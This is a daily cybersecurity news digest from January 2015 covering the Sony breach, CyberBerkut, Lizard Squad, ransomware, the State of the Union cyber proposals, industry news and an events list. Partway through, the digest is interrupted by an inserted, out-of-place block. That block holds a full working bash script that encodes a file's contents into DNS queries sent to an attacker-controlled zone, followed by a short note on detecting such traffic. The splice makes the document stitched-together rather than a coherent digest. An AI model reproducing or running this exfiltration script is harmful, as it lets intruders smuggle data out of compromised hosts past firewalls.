Reports assert that Sony's hackers exploited a zero-day vulnerability in their assault on the film company. (What that zero-day may have been is left unspecified due to its "sensitivity.")
CyberBerkut is tied more closely to recent attacks on German government sites. One of their operatives, "Mink," is said to be Australian, which indicates how geographically broad a net governments cast when they trawl for useful idiots ("полезные дураки," as Lenin might or might not have called them) in cyberspace.
Recorded Future continues its look at Lizard Squad, and finds its members are about what one would expect.
ComRAT and CryptoWall 3.0 continue to operate against their targets, respectively military and civilian. Analysts describe the workings of Vawtrak and Tyupkin malware families.
New vulnerabilities and proof-of-concept attacks are described.
Oracle and Ubuntu issue patches.
Corporate boards take cyber risk management to heart.
The US President's State of the Union address, much anticipated by the cyber sector, appears to have driven a rise in security industry story stocks. Last night's speech prominently featured President Obama's proposed cyber legislation, which he pointedly dropped in Congressional laps. Observers like information sharing, are dubious about disclosure rules, and don't at all care for what many see as entrusting civil liberties in cyberspace to prosecutorial discretion. Defense Department cyber roles and missions will probably serve as a bellwether for legislative direction.
The US and UK make their already close cyber cooperation closer still. (The lads from Malvern really want a share of the US cyber market.)
Today's issue includes events affecting Australia, China, France, Germany, Democratic People's Republic of Korea, Russia, Saudi Arabia, Ukraine, United Kingdom, United States.
Cyber Attacks, Threats, and Vulnerabilities
Here's What Helped Sony's Hackers Break In: Zero-Day Vulnerability(Re/code) The hackers behind the devastating attack against Sony Pictures Entertainment late last year exploited a previously undisclosed vulnerability in its computer systems that gave them unfettered access and enabled them to reach and attack other parts of the studio's network
Hacktivist Group CyberBerkut Behind Attacks on German Official Websites(TrendLabs Security Intelligence Blog) A pro-Russian group called CyberBerkut claimed responsibility for a recent hack on certain German government websites in early January. We were able to gather some information on some of its members based on Pastebin data that had been leaked by the Ukrainian nationalist political party (Pravy Sektor)
Lizard Squad: Two Bot Thugs(Recorded Future) Web intelligence has led to an analysis of Lizard Squad's Linux botnet, LizardStresser or lizardstresser.su. Further link analysis of an email address associated with LizardStresser led to the discovery of a Windows botnet on ernsthaft.su. Analysis of key cyber personas in Lizard Squad via their Twitter accounts through Recorded Future illuminated their interest in illegal drugs, thugs, guns, and Nazis
Traffic Patterns For CryptoWall 3.0(Internet Storm Center) Various sources have reported version 3 of CryptoWall has appeared. This malware is currently seen from exploit kits and phishing emails. CryptoWall is one of many ransomware trojans that encrypt the personal files on your computer and demand a bitcoin payment before you can unlock them
Tyupkin ATM Malware Analysis(Infosec Institute) Some time ago, Kaspersky discovered and reported a new type of malicious program called Tyupkin, which targets ATMs directly: rather than skimming consumers' debit card numbers, it dispenses cash from the machine without needing a counterfeit or stolen card
Vivino wine-lovers' app leaked personal information(Hot for Security) Vivino, a popular smartphone app that allows wine-lovers to scan their favourite bottles of plonk and share recommendations with their friends, has left a sour taste in the mouth after a security researcher found a privacy vulnerability
11% of Android banking and finance apps are dangerous(Help Net Security) RiskIQ found that more than 40,000 of the 350,000 apps which reference banking in the world's top 90 app stores contain malware or suspicious binaries. Another 40,000 contained dangerous permissions
Looking Back (and Forward) at PoS Malware(TrendLabs Security Intelligence Blog) 2014 became the year that placed PoS (point-of-sale) threats in the spotlight. Make no mistake — PoS threats have existed for years. However, the Target data breach last January was the first incident that made the general public notice this threat
Ubuntu Patches Several Security Flaws(Threatpost) Ubuntu has released a number of patches for security vulnerabilities in several versions of the OS, including some remote code execution flaws in Thunderbird, which is included with Ubuntu
World Economic Forum Warns About "Global Threat" of IoT Hacking(Gizmodo) You know that character in some horror films who warns unsuspecting (usually) teenage victims of their impending death? The World Economic Forum's Global Risks report is kind of like that guy, filled with doom but offering damn good advice on how to stay alive. This year, the report focused on the internet of things.
Cybersecurity stocks gain on pending Obama proposals(Seeking Alpha) The White House has disclosed Pres. Obama will outline this week "a series of legislative proposals and executive actions that will be in his [Jan. 20] State of the Union that will tackle identity theft and privacy issues, cybersecurity, and access to the Internet." Several security tech plays, some of which received a lift last month from the Sony hack and its fallout, are higher in spite of a 0.9% Nasdaq drop. FEYE +4.5%. CUDA +6.9%. PANW +1.2%. CYBR +1.7%. PFPT +1.3%
Cyber resilience core to safeguarding investment value(COOConnect) The warning by the Bank of England's Financial Policy Committee last month that financial firms in the UK are underestimating the threat of cybercrime, coupled with recent high-profile blow-by-blow media accounts of companies under attack, is set to keep cyber resilience firmly on corporate governance agendas. For private equity firms, such risks pose fundamental challenges. Cyber attacks have a significant impact on victims, with some 60% of small firms forced to close within six months of an attack, according to the US National Cyber Security Alliance
Amendment to Combined Synopsis/Solicitation — for Information Assurance, Operations and Compliance, Systems and Technology Support Services(Insurance News Net) This announcement is prepared and posted in accordance with Federal Acquisition Regulation (FAR) Subpart 5.2 to notify potential Offerors of a solicitation for services for the Defense Microelectronics Activity (DMEA). Solicitation number HQ0727-15-R-0003 requests proposals for Information Assurance, Operations and Compliance, Systems and Technology Support Services for all Defense Microelectronics Activity (DMEA). The objective of this contract is to acquire services for Information Assurance, Operations and Compliance, Systems and Technology Support Services for all Defense Microelectronics Activity (DMEA) information technology, networking, communications, safety, surveillance, and critical infrastructure software, systems, and applications
Cybersecurity contractor opens center in Augusta(Augusta Chronicle) Chiron Technology Services, a Maryland-based cybersecurity company, opened a Regional Cybersecurity Development Center Jan. 1 on Interstate Parkway, according to local real estate company Sherman & Hemstreet
LockPath Prepares for 2015 by Doubling Executive Team(Marketwired) LockPath Inc. has added four members to its executive team in the past month to enhance the company's ability to serve its growing client base, lead its expanding workforce and execute its growth strategy in 2015
CyberSecurity.com Acquired by Adam Strong(Domain Investing) 2014 was a big year for Adam Strong. His company sold the high profile domain names Racing.com and BTC.com, and he also privately acquired quite a few keyword domain names, such as Strong.com
World Economic Forum Proposes New Cyber Risk Framework(SecurityWeek) With the annual World Economic Forum meeting in Switzerland just days away, the organization and its partners have released a new framework designed to help businesses calculate the impact of cyber-threats
Partnering for Cyber Resilience Towards the Quantification of Cyber Threats(World Economic Forum) Threats grow with the rapid expansion of data-driven technologies. The convergence of web, cloud, social, mobile and Internet of Things platforms is inherently oriented to sharing data, not security. As these technologies expand in use, so do the risks, making cyber risk management imperative to organizations today
Heightened cyber threat demands risk focus(Actuarial Post) Cyber and terrorism have been rated the most significant emerging risks facing the insurance and reinsurance sector in 2015, according to a survey of US industry executives. It is a sentiment reflected by the UK government, which last month convened a group of CEOs from the country's largest insurers, to encourage collaboration and "to make the UK one of the safest places to do business in cyberspace". While the insurance sector is set to play a key role in minimising the long-term financial fallout from an attack, cyber risks cannot be tackled with insurance alone
Network Segmentation: A Best Practice We Should All be Using(Infosec Island) It would be nice to be able to say that we are winning the war; that network security efforts are slowly getting the better of the bad guys. But I can't do that. Despite all the money being thrown at security tools and hosted services, the cyber-thugs are improving their game at a faster rate than we are. The ten worst known cyber security breaches of this century have all taken place since 2008, and 2013 and 2014 are notorious for their information security incidents
Bash data exfiltration through DNS (using bash builtin functions)(forsec) After gaining 'blind' command execution access to a compromised Linux host, data exfiltration can be difficult when the system is protected by a firewall. Sometimes these firewalls prevent the compromised host from establishing connections to the internet. In these cases, data exfiltration through the DNS protocol can be useful, since DNS queries are often not blocked by a firewall, and bash can build and send the queries with its builtins alone, without dig, nslookup or curl on the host. I've had a real life situation like this, which I will describe later on
Exploit Pack — Open Source Security Project for Penetration Testing and Exploit Development(Kitploit) Exploit Pack is an open source GPLv3 security tool, which means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Impact are ready to use as well, but you will require an expensive license to get access to all the features, for example: automatic exploit launching, full report capabilities, reverse shell agent customization, etc. Exploit Pack is fully free, open source and GPLv3. Because this is an open source project you can always modify it, add or replace features and get involved in the next project decisions; everyone is more than welcome to participate. We developed this tool thinking for and as pentesters. As security professionals we use Exploit Pack on a daily basis to deploy real environment attacks into real corporate clients
Discovering and remediating an active but disused botnet(Colin Keigher) On a network I help manage, we kept getting malicious DNS alerts for "luna1.pw" on an appliance we had installed. Due to the way the network was configured, we were able to see the name request coming in but no traffic activity. This was unusual because the appliance was configured to monitor all traffic, so why was it not picking up anything further than what it was reporting? Why didn't the supposed malware connect? Resolving the domain led to an answer
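The DNS exfiltration technique summarised in the forsec item above, as an added example that is not code from the forsec post: the data to exfiltrate is hex-encoded and chunked into DNS labels, each label becomes a subdomain of an attacker-controlled zone, and the A query for that name is assembled as raw bytes and written to bash's /dev/udp redirection, so nothing beyond bash builtins is needed on the compromised host. The zone (exfil.example), the resolver address and the sequence-number label layout are assumptions for illustration, not taken from the article.

```bash
#!/bin/bash
# Added example, not code from the forsec post. ZONE and RESOLVER are
# hypothetical placeholders: an attacker-controlled zone and the resolver
# the firewall still lets the compromised host talk to on UDP/53.
ZONE="${ZONE:-exfil.example}"
RESOLVER="${RESOLVER:-127.0.0.1}"

# Hex-encode stdin one byte at a time using only builtins (no xxd/od).
# `read -n 1` returns an empty string for a newline, so that case is
# encoded explicitly as 0x0a; LC_ALL=C keeps printf working per byte.
hex_encode() {
  local LC_ALL=C c out=""
  while IFS= read -r -n 1 c; do
    if [ -z "$c" ]; then out+="0a"; else out+=$(printf '%02x' "'$c"); fi
  done
  printf '%s' "$out"
}

# Split the hex stream into 56-character data labels (the DNS limit is 63,
# and the "<seq>-" prefix must fit) so the receiver can reorder queries
# that arrive out of order. One query name per line on stdout.
build_queries() {
  local hex="$1" seq=0 chunk
  while [ -n "$hex" ]; do
    chunk="${hex:0:56}"; hex="${hex:56}"
    printf '%d-%s.%s\n' "$seq" "$chunk" "$ZONE"
    seq=$((seq + 1))
  done
}

# Emit a minimal DNS A query for name $1 as raw bytes: 12-byte header
# (ID 0xaaaa, RD set, QDCOUNT 1), length-prefixed labels, root label,
# QTYPE A (1), QCLASS IN (1). Octal escapes keep it to builtin printf.
dns_packet() {
  local name="$1" label
  local -a labels
  printf '\252\252\001\000\000\001\000\000\000\000\000\000'
  IFS=. read -r -a labels <<< "$name"
  for label in "${labels[@]}"; do
    printf "\\$(printf '%03o' "${#label}")%s" "$label"
  done
  printf '\000\000\001\000\001'
}

# Send every query for file $1 over UDP/53 via /dev/udp (bash opens the
# socket itself). Replies are ignored: the query name carries the data.
exfil_file() {
  local name
  build_queries "$(hex_encode < "$1")" | while read -r name; do
    dns_packet "$name" > "/dev/udp/$RESOLVER/53"
  done
}

# Only sends when SEND=1, so the example stays offline by default.
if [ "${SEND:-0}" = 1 ]; then
  exfil_file "${1:-/etc/hostname}"
fi
```

On the receiving side the authoritative server for the zone simply logs every query name and reassembles the hex in sequence order. For defenders, the same properties that make this work are the detection signal: many unique, long, high-entropy labels under one zone, queries that never result in follow-on traffic to the answered address, and query volume from a host that has no business doing name lookups at that rate. The luna1.pw item that follows is the benign-looking mirror image, a name request with no traffic behind it, which is exactly why DNS alerts deserve a second look even when nothing else fires.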
Finding Privilege Escalation Flaws in Linux(Internet Storm Center) We often tend to ignore privilege escalation flaws. In order to take advantage of these vulnerabilities, an attacker first needs to have access to the system itself. But in particular for systems that many users have access to, it can be difficult to monitor them all for compromised credentials. Systems with web servers often suffer from web application flaws that can be used to execute code as the web server, which then can be used to gain root access via a privilege escalation flaw
British Spy Agency Has Its Eye on Investigative Journalists(Sputnik News) As some of the West's most senior cyber-security defence chiefs meet in London, fresh documents revealed by former CIA contractor Edward Snowden — now living in Moscow — show that the UK intelligence agency GCHQ has hacked thousands of emails from journalists
7 Reasons Security Wonks Should Watch the State of the Union Tonight(Wired) President Obama has left few questions about what he plans to unveil in his State of the Union address tonight, having dropped several previews in the last two weeks about legislation the White House is proposing. He will undoubtedly go into more detail tonight at 9 p.m. ET, and we will be watching specifically to hear him expand on comments already made about proposed changes to cybersecurity legislation
Obama cybersecurity proposals: 'Devil is in the details'(Al Jazeera: the Scrutineer) In a preview of next Tuesday's State of the Union address, President Obama spent this week rolling out a long list of new cybersecurity initiatives that includes legislation to protect consumers' private data
The Hypocrisy of U.S. Cyber Policy(TechCrunch) The breakneck growth in internet usage over the past two decades has forced policymakers to confront a host of challenges, from how to regulate the sharing economy to who owns the infrastructure behind the "tubes" themselves. While tempers have flared on a number of these issues, I tend to give the benefit of the doubt to policymakers. The transformation of our society has been so complete and rapid, we simply can't expect the rebuilding of our laws to be a simple proposition
Bold reform needed to strengthen U.S cybersecurity(Help Net Security) Mr. President, the status quo in cybersecurity is failing the U.S. It is failing the commercial sector, which is being publicly breached on a weekly basis, and it is failing the government as well. It is time to take bold and decisive action to stop these dangerous and embarrassing hacks before they cause further damage and erode the confidence that is vital to the U.S. economy
Microsoft and the US government fight over data in the cloud(WinBeta) The battle of big business versus big government is being fought among the clouds, or at least among Microsoft's international cloud servers. Microsoft's director of cyber security and cloud strategy has shared a post titled 'Privacy considerations in a cloudy world.' The post highlights points regarding Microsoft's cyber security made by their Chief Privacy Officer in a video (embedded below). Microsoft is in the midst of a battle with the government when it comes to protecting their users' data
Nearly all US arms programs found vulnerable to cyber attack(IT News) Nearly every US weapons program tested in fiscal 2014 showed "significant vulnerabilities" to cyber attacks, including misconfigured, unpatched and outdated software, the Pentagon's chief weapons tester revealed in his annual report
Silk Road Judge 'Eviscerates' Defense's Evidence That Mt. Gox CEO Was a Suspect(Wired) Last week produced a stunner in the Silk Road trial: the revelation that the Department of Homeland Security suspected Mt. Gox CEO Mark Karpeles of running the massive, anonymous narcotics market just months before settling instead on defendant Ross Ulbricht. But just as quickly as Ulbricht's defense revealed that alternate theory of the Silk Road's ownership, the prosecution and judge have shoved key elements of the story back into the closet
How Was Your Credit Card Stolen?(KrebsOnSecurity) Almost once a week, I receive an email from a reader who has suffered credit card fraud and is seeking help figuring out which hacked merchant was responsible. I generally reply that this is a fruitless pursuit, and instead encourage readers to keep a close eye on their card statements and report any fraud. But it occurred to me recently that I've never published a primer on the types of card fraud and the likelihood with each of the cardholder ever learning how their account was compromised. This post is an effort to remedy that
For a complete running list of events, please visit the Event Tracker on the CyberWire website.
Cyber Security Summit: Industrial Sector & Governments(Prague, Czech Republic, April 14 - 15, 2015) Cyber Security Summit Europe — Industrial Sector & Governments brings together cyber security experts who will share their skills and know-how needed to address highly topical issues such as state-sponsored...
Cyber Security Summit: Financial Services(Prague, Czech Republic, April 14 - 15, 2015) Cyber Security Summit Europe — Financial Services brings together cyber security experts across the financial sector to discuss topical security vulnerabilities as well as bring forward effective...
FIC 2015(Lille, France, January 20 - 21, 2015) The International Cybersecurity Forum (FIC) forms part of a thinking and exchange process that aims at promoting a pan-European vision of cybersecurity and strengthening the fight against cybercrime, a...
AppSec California(Santa Monica, California, USA, January 26 - 28, 2015) OWASP's AppSec California goes beyond "security for security's sake" bringing application security professionals and business experts together with the objective of sharing new information that helps get...
Financial Cryptography and Data Security 2015(San Juan, Puerto Rico, USA, January 26 - 30, 2015) The goal of the conference is to bring security and cryptography researchers and practitioners together with economists, bankers, implementers and policy-makers. Intimate and colourful by tradition, the...
Data Privacy Day San Diego — The Future of IoT and Privacy(San Diego, California, USA, January 28, 2015) Join the Lares Institute, Morrison & Foerster, and the National Cyber Security Alliance for Data Privacy Day in San Diego. DPD San Diego will bring together privacy luminaries to discuss fundamental issues...
CSEAN Cyber Secure Nigeria 2015 Conference(Garki Abuja, Nigeria, January 29, 2015) The vast scope of cyber threats makes a compelling case for a multi-stakeholder collaboration in curbing domestic and International threat. "Cyber Secure Nigeria 2015" conference encapsulates various hot...
Data Connectors Los Angeles 2015(Los Angeles, California, USA, January 29, 2015) The Los Angeles Tech-Security Conference features 25-30 vendor exhibits and several industry experts discussing current tech-security issues such as email security, VoIP, LAN security, wireless security,...
Transnational Organized Crime as a National Security Threat(Washington, DC, USA, January 29, 2015) United Kingdom's National Crime Agency Director General Keith Bristow will discuss transnational organized crime as a national security threat, focusing on economic and cyber crimes, and digging into the...
ISSA CISO Forum(Atlanta, Georgia, USA, January 29 - 30, 2015) Corporate Information Security and Legal programs must be closely aligned to be successful in today's world. Customer and vendor contracts require strong security language. Response to data breaches are...
NEDForum > London "What we can learn from the Darknet" (London, England, UK, January 30, 2015) The 2nd NED Forum event comes to London on Friday 30th January 2015, the day of the White Hat Ball. The event will focus on the Darknet and where it provides a rich source of learning that can be applied...
Cyber Threat Intelligence Summit(Washington, DC, USA, February 2 - 9, 2015) Join SANS for this innovative event as we focus on enabling organizations to build effective cyber threat intelligence analysis capabilities
Suits and Spooks(Washington, DC, USA, February 4 - 5, 2015) Suits and Spooks DC (Feb 4-5, 2015) is moving to the Ritz Carlton hotel in Pentagon City! We're expanding our attendee capacity to 200 and for the first time will be including space for exhibitors. We...
Nullcon 2015(Goa, India, February 4 - 7, 2015) Nullcon discusses and showcases the future of information security, the next generation of offensive and defensive security technology, as well as unknown threats
ICISSP 2015(Angers, Loire Valley, France, February 9 - 11, 2015) The International Conference on Information Systems Security and Privacy aims at creating a meeting point of researchers and practitioners that address security and privacy challenges that concern information...
2015 Cyber Risk Insights Conference — London(London, England, UK, February 10, 2015) The cyber threat landscape is undergoing rapid change. Lloyd's and the London market are at the forefront of developing insurance products to address the evolving exposures of organizations throughout...
AFCEA West 2015(San Diego, California, USA, February 10 - 12, 2015) Showcasing emerging systems, platforms, technologies and networks that will impact all areas of current and future Sea Service operations.
Cybersecurity: You Don't Know What You Don't Know(Birmingham, Alabama, USA, February 24 - 25, 2015) What: Connected World Conference in partnership with University of Alabama at Birmingham's Center for Information Assurance and Joint Forensics Research (The Center) have teamed up to bring professionals...